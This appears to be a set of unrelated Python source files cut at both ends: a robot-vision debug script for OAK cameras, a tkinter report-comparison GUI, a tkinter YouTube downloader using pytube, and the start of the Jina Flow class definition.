                sleep(10)
finally:
log.info("Exiting Program...")
def run_goal_detection(self, device_info):
self.device_list['OAK-D_Goal']['nt_tab'].putString("OAK-D_Goal Stream", self.device_list['OAK-D_Goal']['stream_address'])
for frame, edgeFrame, bboxes in goal_edge_depth_detection.capture(device_info):
self.parse_goal_frame(frame, edgeFrame, bboxes)
def run_intake_detection(self, device_info):
self.device_list['OAK-1_Intake']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1_Intake']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
self.parse_intake_frame(frame, edgeFrame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_goal_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_goal_frame(frame, edgeFrame, bboxes)
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
target_x = bbox['target_x'] if 'target_x' in bbox else 0
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
cv2.putText(edgeFrame, "x: {}".format(round(target_x, 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "z: {}".format(round(bbox['depth_z'], 2)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "label: {}".format(self.goal_labels[bbox['label']], 1), (bbox['x_min'], bbox['y_min'] + 130),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-D Goal Edge", edgeFrame)
cv2.imshow("OAK-D Goal ", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_intake_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_intake_frame(frame, edgeFrame, bboxes)
for i, bbox in enumerate(bboxes):
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
frame_color = (0, 255, 0) if i == 0 else (0, 150, 150)
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), frame_color, 2)
cv2.putText(frame, "x: {}".format(round(bbox['x_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "size: {}".format(round(bbox['size'], 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Intake Edge", edgeFrame)
cv2.imshow("OAK-1 Intake", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting goal-depth-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
|
main.py
|
import logging
import queue
import threading
from threading import Thread
from tkinter import ttk, DISABLED, NORMAL, NSEW
from tkinter.scrolledtext import ScrolledText
import tkinter as tk
from tkinter import N, W, S, E, Tk, BooleanVar
import validators
from bavli_reports.report_worker import do_report_work
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def thread_worker(**kwargs):
logger.info("Starting the magic... \U0001F52E \U00002728 \U0001F609")
def logging_func(msg, level=logging.INFO):
logger.log(level, msg)
def do_work():
try:
do_report_work(bavli_report_url=bavli_url.get(), external_report_url=external_url.get(),
logging_func=logging_func)
except Exception as e:
logger.error(f"Oops something went wrong! {e}")
threading.Thread(target=do_work).start()
class QueueHandler(logging.Handler):
"""Class to send logging records to a queue
It can be used from different threads
"""
def __init__(self, log_queue):
super().__init__()
self.log_queue = log_queue
def emit(self, record):
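        # Called by the logging framework (possibly from worker threads); just
        # enqueue the record for the GUI thread to display.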
self.log_queue.put(record)
class ConsoleUi:
"""Poll messages from a logging queue and display them in a scrolled text widget"""
def __init__(self, frame):
self.frame = frame
self.frame.rowconfigure(0, weight=1)
self.frame.columnconfigure(0, weight=1)
        # Create a ScrolledText widget
self.scrolled_text = ScrolledText(frame, state='disabled', background='white')
self.scrolled_text.grid(row=0, column=0, rowspan=3, columnspan=3, sticky=NSEW)
self.scrolled_text.configure(font=('TkFixedFont', 16))
self.scrolled_text.tag_config('NOTSET', foreground='green')
self.scrolled_text.tag_config('INFO', foreground='black')
self.scrolled_text.tag_config('DEBUG', foreground='purple')
self.scrolled_text.tag_config('WARNING', foreground='orange')
self.scrolled_text.tag_config('ERROR', foreground='red')
self.scrolled_text.tag_config('CRITICAL', foreground='red', underline=1)
# Create a logging handler using a queue
self.log_queue = queue.Queue()
self.queue_handler = QueueHandler(self.log_queue)
formatter = logging.Formatter(fmt='%(asctime)s Hagai says: %(message)s', datefmt='%H:%M:%S')
self.queue_handler.setFormatter(formatter)
self.queue_handler.setLevel(logging.DEBUG)
logger.addHandler(self.queue_handler)
# Start polling messages from the queue
self.frame.after(100, self.poll_log_queue)
def display(self, record):
msg = self.queue_handler.format(record)
self.scrolled_text.configure(state='normal')
self.scrolled_text.insert(tk.END, msg + '\n', record.levelname)
self.scrolled_text.configure(state='disabled')
# Autoscroll to the bottom
self.scrolled_text.yview(tk.END)
def poll_log_queue(self):
# Check every 100ms if there is a new message in the queue to display
while True:
try:
record = self.log_queue.get(block=False)
except queue.Empty:
break
else:
self.display(record)
self.frame.after(100, self.poll_log_queue)
if __name__ == "__main__":
urls = []
def check_both_url():
for url in urls:
if not validators.url(url.get()):
start_button["state"] = DISABLED
return
start_button["state"] = NORMAL
logger.info("Ok we are all set!")
root = Tk()
root.title("Report Master")
s = ttk.Style()
s.configure("Go.TButton", foreground='green', font=('Ariel', 16))
s.configure("TFrame", background='white')
content = ttk.Frame(root, padding=(3, 3, 12, 12))
greeting_label = ttk.Label(content, text="Hi Guy, welcome to the reports master", anchor="center")
start_button = ttk.Button(content, text="Go!", state=DISABLED, command=thread_worker, style="Go.TButton")
bavli_label = ttk.Label(content, text="Your sheet URL")
bavli_string_var = tk.StringVar()
bavli_string_var.trace("w", lambda name, index, mode, sv=bavli_string_var: check_both_url())
bavli_url = ttk.Entry(content, textvariable=bavli_string_var)
external_string_var = tk.StringVar()
    external_string_var.trace("w", lambda name, index, mode, sv=external_string_var: check_both_url())
external_label = ttk.Label(content, text="External sheet URL")
external_url = ttk.Entry(content, textvariable=external_string_var)
urls.extend([bavli_url, external_url])
matches_var = BooleanVar(value=False)
show_matches = ttk.Checkbutton(content, text="Show Matches", variable=matches_var, onvalue=True)
frame = ttk.LabelFrame(content, text="Status", borderwidth=5, relief="ridge")
console_ui = ConsoleUi(frame=frame)
content.grid(column=0, row=0, sticky=(N, S, E, W))
greeting_label.grid(column=0, row=0, columnspan=3, sticky=(N, S, E, W))
bavli_label.grid(column=0, row=1, sticky=(N, W), padx=5)
bavli_url.grid(column=1, row=1, columnspan=2, sticky=(N, E, W), pady=5, padx=5)
external_label.grid(column=0, row=2, sticky=(N, W), padx=5)
external_url.grid(column=1, row=2, columnspan=2, sticky=(N, E, W), pady=5, padx=5)
# show_matches.grid(column=0, row=3)
frame.grid(column=0, row=4, columnspan=3, rowspan=3, sticky=(N, S, E, W))
start_button.grid(column=1, row=7, sticky=(N, S, E, W))
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
content.columnconfigure(1, weight=3)
content.columnconfigure(2, weight=3)
content.rowconfigure(4, weight=1)
content.rowconfigure(5, weight=1)
content.rowconfigure(6, weight=1)
content.rowconfigure(7, weight=1)
root.mainloop()
|
main.py
|
import threading
import time
from tkinter.filedialog import *
from pytube import YouTube, request
# dark mode :
def darkmode():
global btnState
if btnState:
btn.config(image=offImg, bg="#CECCBE", activebackground="#CECCBE")
root.config(bg="#CECCBE")
txt.config(text="Dark Mode: OFF", bg="#CECCBE")
btnState = False
else:
btn.config(image=onImg, bg="#2B2B2B", activebackground="#2B2B2B")
root.config(bg="#2B2B2B")
txt.config(text="Dark Mode: ON", bg="#2B2B2B")
btnState = True
is_paused = is_cancelled = False
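# Module-level flags shared between the Tk GUI callbacks and the download thread.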
def download_media(url,filename,audioOnly=False):
if(url):
global is_paused, is_cancelled
download_button['state'] = 'disabled'
download_audio_button['state'] = 'disabled'
pause_button['state'] = 'normal'
cancel_button['state'] = 'normal'
try:
progress['text'] = 'Connecting ...'
yt = YouTube(url)
if(audioOnly):
stream = yt.streams.filter(subtype='mp4',only_audio=True).first()
else:
stream = yt.streams.filter(subtype='mp4').first()
filesize = stream.filesize
with open(filename, 'wb') as f:
is_paused = is_cancelled = False
stream = request.stream(stream.url)
downloaded = 0
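                # Stream the media chunk by chunk so the GUI flags can pause or
                # cancel the download between chunks.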
while True:
if is_cancelled:
progress['text'] = 'Download cancelled'
break
                    if is_paused:
                        # Sleep briefly while paused instead of spinning at full CPU.
                        time.sleep(0.1)
                        continue
chunk = next(stream, None)
if chunk:
f.write(chunk)
downloaded += len(chunk)
progress['text'] = f'Downloaded {downloaded} / {filesize}'
else:
# no more data
progress['text'] = 'Download completed'
break
print('done')
except Exception as e:
print(e)
download_button['state'] = 'normal'
download_audio_button['state'] = 'normal'
pause_button['state'] = 'disabled'
cancel_button['state'] = 'disabled'
def start_download():
filename = askdirectory()
filename = filename+'/sample.mp4'
threading.Thread(target=download_media, args=(url_entry.get(),filename), daemon=True).start()
def start_audio_download():
filename = askdirectory()
filename = filename+'/sample.mp3'
threading.Thread(target=download_media, args=(url_entry.get(),filename,True), daemon=True).start()
def toggle_download():
global is_paused
is_paused = not is_paused
pause_button['text'] = 'Resume' if is_paused else 'Pause'
def cancel_download():
global is_cancelled
is_cancelled = True
# gui
root = Tk()
root.title("Youtube Downloader")
root.iconbitmap("main img/icon.ico")
root.geometry("500x650")
# switch toggle:
btnState = False
# switch images:
onImg = PhotoImage(file="dark img/switch-on.png")
offImg = PhotoImage(file="dark img/switch-off.png")
# Copyright
originalBtn = Button(root, text="Made by Swapnil", font="Rockwell", relief="flat")
originalBtn.pack(side=BOTTOM)
# Night Mode:
txt = Label(root, text="Dark Mode: OFF", font="FixedSys 17", bg="#CECCBE", fg="green")
txt.pack(side='bottom')
# switch widget:
btn = Button(root, text="OFF", borderwidth=0, command=darkmode, bg="#CECCBE", activebackground="#CECCBE", pady=1)
btn.pack(side=BOTTOM, padx=10, pady=10)
btn.config(image=offImg)
# main icon section
file = PhotoImage(file="main img/youtube.png")
headingIcon = Label(root, image=file)
headingIcon.pack(side=TOP, pady=3)
# Url Field
url_entry = Entry(root, justify=CENTER, bd=5, fg='green')
url_entry.pack(side=TOP, fill=X, padx=10)
url_entry.focus()
# Download Button
download_button = Button(root, text='Download', width=10, command=start_download, font='verdana', relief='ridge', bd=5, bg='#f5f5f5', fg='black')
download_button.pack(side=TOP, pady=10)
# Download Audio Button
download_audio_button = Button(root, text='Download Audio', width=14, command=start_audio_download, font='verdana', relief='ridge', bd=5, bg='#f5f5f5', fg='black')
download_audio_button.pack(side=TOP, pady=10)
# Progress
progress = Label(root)
progress.pack(side=TOP)
# Pause Button
pause_button = Button(root, text='Pause', width=10, command=toggle_download, state='disabled', font='verdana', relief='ridge', bd=5, bg='#f5f5f5', fg='black')
pause_button.pack(side=TOP, pady=10)
# Cancel Button
cancel_button = Button(root, text='Cancel', width=10, command=cancel_download, state='disabled', font='verdana', relief='ridge', bd=5, bg='#f5f5f5', fg='black')
cancel_button.pack(side=TOP, pady=10)
root.mainloop()
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
Optional,
Union,
Tuple,
List,
Set,
Dict,
overload,
Type,
TYPE_CHECKING,
)
from jina.orchestrate.flow.builder import allowed_levels, _hanging_pods
from jina import __default_host__, helper
from jina.clients import Client
from jina.clients.mixin import AsyncPostMixin, PostMixin
from jina.enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
)
from jina.excepts import FlowTopologyError, FlowMissingPodError, RuntimeFailToStart
from jina.helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from jina.jaml import JAMLCompatible
from jina.logging.logger import JinaLogger
from jina.parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from jina.parsers.flow import set_flow_parser
from jina.orchestrate.pods import Pod
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
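# Matches a trailing ':<port>'; group 1 captures the host part and group 2 a port in the 0-65535 range.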
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from jina.serve.executors import BaseExecutor
from jina.clients.base import BaseClient
from jina.orchestrate.flow.asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
results_as_docarray: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param results_as_docarray: If set, return results as DocArray instead of Request.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
connection_list: Optional[str] = None,
cors: Optional[bool] = False,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
graph_description: Optional[str] = '{}',
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
pods_addresses: Optional[str] = '{}',
polling: Optional[str] = 'ANY',
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after_address: Optional[str] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
            Note that this is not necessarily effective;
            it depends on the settings of `--compress-min-bytes` and `--compress-min-ratio`.
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param connection_list: dictionary JSON with a list of connections to configure
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
        :param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true tells the Pea not to wait on the Runtime when closing.
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
        :param expose_public: If set, expose the public IP address to remote peers when necessary; by default the private IP address is exposed, which only allows access from the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas.
:param graph_description: Routing graph for the gateway
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
        :param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param pods_addresses: dictionary JSON with the input addresses of each Pod
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
        :param uses_after_address: The address of the uses-after runtime
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
polling: Optional[str] = 'ANY',
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
timeout_ctrl: Optional[int] = 60,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
        self._version = '1'  #: YAML version number; may be overridden later by the YAML config
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
        ]  #: the default first pod is the gateway; it is added during build()
self._update_args(args, **kwargs)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from jina.parsers.flow import set_flow_parser
from jina.helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from jina.orchestrate.flow.asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the input/output of a Pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
pod_addresses: Dict[str, List[str]],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.noblock_on_start = True
args.graph_description = json.dumps(graph_description)
args.pods_addresses = json.dumps(pod_addresses)
self._pod_nodes[GATEWAY_NAME] = Pod(args, needs)
def _get_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
graph_dict[node] = [f'{v.protocol}://{v.host}:{v.head_port_in}']
return graph_dict
def _get_k8s_pod_addresses(self, k8s_namespace: str) -> Dict[str, List[str]]:
graph_dict = {}
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.pods.config.helper import to_compatible_name
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
pod_k8s_address = (
f'{to_compatible_name(v.head_args.name)}.{k8s_namespace}.svc'
)
graph_dict[node] = [
f'{pod_k8s_address}:{K8sGrpcConnectionPool.K8S_PORT_IN}'
]
return graph_dict
def _get_docker_compose_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.pods.config.docker_compose import PORT_IN
from jina.orchestrate.pods.config.helper import to_compatible_name
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
pod_docker_compose_address = (
f'{to_compatible_name(v.head_args.name)}:{PORT_IN}'
)
graph_dict[node] = [pod_docker_compose_address]
return graph_dict
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same pod
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._pod_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# find all non-hanging leaves
last_pod = self.last_pod
if last_pod != 'gateway':
graph_dict[last_pod].append('end-gateway')
return graph_dict
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow; wait until all Peas defined in **needs** have completed.
.. # noqa: DAR401
:param needs: list of service names to wait for
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
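Example, a minimal sketch of waiting on two parallel branches (the Pod names ``p1`` and ``p2`` are hypothetical):
.. highlight:: python
.. code-block:: python
from jina import Flow
# p1 and p2 both branch off the gateway; the joiner waits for both to complete
f = Flow().add(name='p1', needs='gateway').add(name='p2', needs='gateway')
f = f.needs(['p1', 'p2'], name='joiner')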
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all hanging Peas have completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
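Example, a sketch that joins every hanging Pod without listing them explicitly (the Pod names are hypothetical):
.. highlight:: python
.. code-block:: python
from jina import Flow
# p1 and p2 are hanging (nothing receives from them) until the joiner collects them
f = Flow().add(name='p1', needs='gateway').add(name='p2', needs='gateway')
f = f.needs_all(name='joiner')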
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connection_list: Optional[str] = None,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
